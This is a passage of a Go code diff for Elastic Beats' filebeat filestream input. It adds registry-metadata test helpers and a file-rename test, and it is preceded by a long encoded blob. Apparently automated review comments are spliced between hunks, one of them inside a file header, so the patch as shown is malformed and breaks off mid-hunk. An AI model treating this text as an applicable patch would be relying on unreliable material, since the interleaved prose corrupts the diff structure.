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" } diff --git a/filebeat/input/filestream/environment_test.go b/filebeat/input/filestream/environment_test.go index 3f651834b6c..ad15c5fefc7 100644 --- a/filebeat/input/filestream/environment_test.go +++ b/filebeat/input/filestream/environment_test.go @@ -34,6 +34,7 @@ import ( v2 "github.com/elastic/beats/v7/filebeat/input/v2" "github.com/elastic/beats/v7/libbeat/beat" "github.com/elastic/beats/v7/libbeat/common" + "github.com/elastic/beats/v7/libbeat/common/transform/typeconv" "github.com/elastic/beats/v7/libbeat/logp" "github.com/elastic/beats/v7/libbeat/statestore" "github.com/elastic/beats/v7/libbeat/statestore/storetest" @@ -55,6 +56,7 @@ type registryEntry struct { Cursor struct { Offset int `json:"offset"` } `json:"cursor"` + Meta interface{} `json:"meta"` } func newInputTestingEnvironment(t *testing.T) *inputTestingEnvironment { 
@@ -176,13 +178,51 @@ func (e *inputTestingEnvironment) requireOffsetInRegistry(filename string, expec
 e.t.Fatalf("cannot stat file when cheking for offset: %+v", err)
 }
- identifier, _ := newINodeDeviceIdentifier(nil)
- src := identifier.GetSource(loginp.FSEvent{Info: fi, Op: loginp.OpCreate, NewPath: filepath})
- entry := e.getRegistryState(src.Name())
+ id := getIDFromPath(filepath, fi)
+ entry, err := e.getRegistryState(id)
+ if err != nil {
+ e.t.Fatalf(err.Error())
+ }
 require.Equal(e.t, expectedOffset, entry.Cursor.Offset)
 }
+// requireMetaInRegistry checks if the expected metadata is saved to the registry.
+func (e *inputTestingEnvironment) waitUntilMetaInRegistry(filename string, expectedMeta fileMeta) {
+ for {
+ filepath := e.abspath(filename)
+ fi, err := os.Stat(filepath)
+ if err != nil {
+ continue
+ }
+
+ id := getIDFromPath(filepath, fi)
+ entry, err := e.getRegistryState(id)
+ if err != nil {
+ continue
+ }
+
+ if entry.Meta == nil {
+ continue
+ }
+
+ var meta fileMeta
+ err = typeconv.Convert(&meta, entry.Meta)
+ if err != nil {
+ e.t.Fatalf("cannot convert: %+v", err)
+ }
+
+ if requireMetadataEquals(expectedMeta, meta) {
+ break
+ }
+ time.Sleep(10 * time.Millisecond)
+ }
+}
+
+func requireMetadataEquals(one, other fileMeta) bool {
+ return one == other
+}
+
 func (e *inputTestingEnvironment) requireNoEntryInRegistry(filename string) {
 filepath := e.abspath(filename)
 fi, err := os.Stat(filepath)
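Review bot: `waitUntilMetaInRegistry` can busy-spin and never return, because every `continue` skips the `time.Sleep` at the bottom of the loop and the loop has no deadline, so a registry entry that never appears blocks the test until the package timeout. Bound the wait and sleep on every iteration, as sketched below. Two smaller things in the same hunk: the doc comment names `requireMetaInRegistry` rather than the function it sits on, and `e.t.Fatalf(err.Error())` passes an error string as the format string (the same call is added to `requireOffsetInRegistryByID` in the next hunk); `e.t.Fatal(err)` avoids that.

```go
func (e *inputTestingEnvironment) waitUntilMetaInRegistry(filename string, expectedMeta fileMeta) {
	// Constructed timeout; choose a value that fits the suite.
	deadline := time.Now().Add(10 * time.Second)
	// The post statement runs on every `continue`, so a miss no longer busy-loops.
	for ; ; time.Sleep(10 * time.Millisecond) {
		if time.Now().After(deadline) {
			e.t.Fatalf("timed out waiting for metadata of %q in registry", filename)
		}
		// … unchanged: stat, getIDFromPath, getRegistryState, nil-Meta check and typeconv.Convert …
		if requireMetadataEquals(expectedMeta, meta) {
			return
		}
	}
}
```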
@@ -204,21 +244,30 @@ func (e *inputTestingEnvironment) requireNoEntryInRegistry(filename string) {
 // requireOffsetInRegistry checks if the expected offset is set for a file.
 func (e *inputTestingEnvironment) requireOffsetInRegistryByID(key string, expectedOffset int) {
- entry := e.getRegistryState(key)
+ entry, err := e.getRegistryState(key)
+ if err != nil {
+ e.t.Fatalf(err.Error())
+ }
 require.Equal(e.t, expectedOffset, entry.Cursor.Offset)
 }
-func (e *inputTestingEnvironment) getRegistryState(key string) registryEntry {
+func (e *inputTestingEnvironment) getRegistryState(key string) (registryEntry, error) {
 inputStore, _ := e.stateStore.Access()
 var entry registryEntry
 err := inputStore.Get(key, &entry)
 if err != nil {
- e.t.Fatalf("error when getting expected key '%s' from store: %+v", key, err)
+ return registryEntry{}, fmt.Errorf("error when getting expected key '%s' from store: %+v", key, err)
 }
- return entry
+ return entry, nil
+}
+
+func getIDFromPath(filepath string, fi os.FileInfo) string {
+ identifier, _ := newINodeDeviceIdentifier(nil)
+ src := identifier.GetSource(loginp.FSEvent{Info: fi, Op: loginp.OpCreate, NewPath: filepath})
+ return "filestream::.global::" + src.Name()
 }
 // waitUntilEventCount waits until total count events arrive to the client.
diff --git a/filebeat/input/filestream/input.go b/filebeat/input/filestream/input.go
index 9c23e18473a..b63f28ff7e6 100644
--- a/filebeat/input/filestream/input.go
+++ b/filebeat/input/filestream/input.go
@@ -298,9 +298,6 @@ func (inp *filestream) readFromSource(
 s.Offset = 0
 case ErrClosed:
 log.Info("Reader was closed. Closing.")
- case reader.ErrLineUnparsable:
- log.Info("Skipping unparsable line in file.")
- continue
 default:
 log.Errorf("Read line error: %v", err)
 }
diff --git a/filebeat/input/filestream/input_integration_test.go b/filebeat/input/filestream/input_integration_test.go
index d37917bd202..67436446cde 100644
--- a/filebeat/input/filestream/input_integration_test.go
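Review bot: `getIDFromPath` in environment_test.go rebuilds the registry key from the literal `"filestream::.global::"` and drops the error from `newINodeDeviceIdentifier(nil)`, so a change to the key layout in the input code would show up only as a missing entry. Because `waitUntilMetaInRegistry` treats a lookup error as "not there yet", a stale prefix would look like a hang rather than a failure. If the input code exposes the prefix (not visible in this diff), build the key from it; otherwise add a comment such as `// must match the key prefix the filestream input writes to the registry` and check the identifier error. In `getRegistryState`, `%w` in place of `%+v` in the `fmt.Errorf` call would keep the store error inspectable by callers.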
+++ b/filebeat/input/filestream/input_integration_test.go
@@ -30,8 +30,6 @@ import (
 "golang.org/x/text/encoding"
 "golang.org/x/text/encoding/unicode"
 "golang.org/x/text/transform"
-
- loginp "github.com/elastic/beats/v7/filebeat/input/filestream/internal/input-logfile"
 )
 // test_close_renamed from test_harvester.py
@@ -43,19 +41,23 @@ func TestFilestreamCloseRenamed(t *testing.T) {
 env := newInputTestingEnvironment(t)
 testlogName := "test.log"
+ // prospector.scanner.check_interval must be set to a bigger interval
+ // than close.on_state_change.check_interval to make sure
+ // the Harvester detects the rename first thus allowing
+ // the output to receive the event and then close the source file.
 inp := env.mustCreateInput(map[string]interface{}{
 "paths": []string{env.abspath(testlogName) + "*"},
- "prospector.scanner.check_interval": "1ms",
+ "prospector.scanner.check_interval": "10ms",
 "close.on_state_change.check_interval": "1ms",
 "close.on_state_change.renamed": "true",
 })
- ctx, cancelInput := context.WithCancel(context.Background())
- env.startInput(ctx, inp)
-
 testlines := []byte("first log line\n")
 env.mustWriteLinesToFile(testlogName, testlines)
+ ctx, cancelInput := context.WithCancel(context.Background())
+ env.startInput(ctx, inp)
+
 // first event has made it successfully
 env.waitUntilEventCount(1)
 env.requireOffsetInRegistry(testlogName, len(testlines))
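Review bot: The ordering `TestFilestreamCloseRenamed` now relies on is only as strong as the 9 ms gap between `"prospector.scanner.check_interval": "10ms"` and `"close.on_state_change.check_interval": "1ms"`; on a loaded CI host the prospector scan may still run first, so the added comment's "to make sure" overstates what two polling intervals can guarantee. Either widen the gap or reword the comment to something like `// ... so the Harvester is likely to detect the rename before the next scan`. The test body continues outside the hunk.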
@@ -75,6 +77,45 @@ func TestFilestreamCloseRenamed(t *testing.T) {
 env.requireOffsetInRegistry(testlogName, len(newerTestlines))
 }
+func TestFilestreamMetadataUpdatedOnRename(t *testing.T) {
+ if runtime.GOOS == "windows" {
+ t.Skip("renaming files while Filebeat is running is not supported on Windows")
+ }
+
+ env := newInputTestingEnvironment(t)
+
+ testlogName := "test.log"
+ inp := env.mustCreateInput(map[string]interface{}{
+ "paths": []string{env.abspath(testlogName) + "*"},
+ "prospector.scanner.check_interval": "1ms",
+ })
+
+ testline := []byte("log line\n")
+ env.mustWriteLinesToFile(testlogName, testline)
+
+ ctx, cancelInput := context.WithCancel(context.Background())
+ env.startInput(ctx, inp)
+
+ env.waitUntilEventCount(1)
+ env.waitUntilMetaInRegistry(testlogName, fileMeta{Source: env.abspath(testlogName), IdentifierName: "native"})
+ env.requireOffsetInRegistry(testlogName, len(testline))
+
+ testlogNameRenamed := "test.log.renamed"
+ env.mustRenameFile(testlogName, testlogNameRenamed)
+
+ // check if the metadata is updated and cursor data stays the same
+ env.waitUntilMetaInRegistry(testlogNameRenamed, fileMeta{Source: env.abspath(testlogNameRenamed), IdentifierName: "native"})
+ env.requireOffsetInRegistry(testlogNameRenamed, len(testline))
+
+ env.mustAppendLinesToFile(testlogNameRenamed, testline)
+
+ env.waitUntilEventCount(2)
+ env.requireOffsetInRegistry(testlogNameRenamed, len(testline)*2)
+
+ cancelInput()
+ env.waitUntilInputStops()
+}
+
 // test_close_removed from test_harvester.py
 func TestFilestreamCloseRemoved(t *testing.T) {
 env := newInputTestingEnvironment(t)
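Review bot: `cancelInput` in `TestFilestreamMetadataUpdatedOnRename` is called only on the last lines, so any failing `require` or `Fatalf` in between ends the test with the input still running, unless the environment cleans up elsewhere (not visible here). Adding `defer cancelInput()` right after `context.WithCancel` covers the failure paths, and the explicit call before `env.waitUntilInputStops()` can stay since cancelling twice is harmless. The same shape appears in the tests added at the end of this file, whose hunk continues past what is shown.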
@@ -87,12 +128,12 @@ func TestFilestreamCloseRemoved(t *testing.T) {
 "close.on_state_change.removed": "true",
 })
- ctx, cancelInput := context.WithCancel(context.Background())
- env.startInput(ctx, inp)
-
 testlines := []byte("first log line\n")
 env.mustWriteLinesToFile(testlogName, testlines)
+ ctx, cancelInput := context.WithCancel(context.Background())
+ env.startInput(ctx, inp)
+
 // first event has made it successfully
 env.waitUntilEventCount(1)
@@ -110,9 +151,8 @@ func TestFilestreamCloseRemoved(t *testing.T) {
 cancelInput()
 env.waitUntilInputStops()
- identifier, _ := newINodeDeviceIdentifier(nil)
- src := identifier.GetSource(loginp.FSEvent{Info: fi, Op: loginp.OpCreate, NewPath: env.abspath(testlogName)})
- env.requireOffsetInRegistryByID(src.Name(), len(testlines))
+ id := getIDFromPath(env.abspath(testlogName), fi)
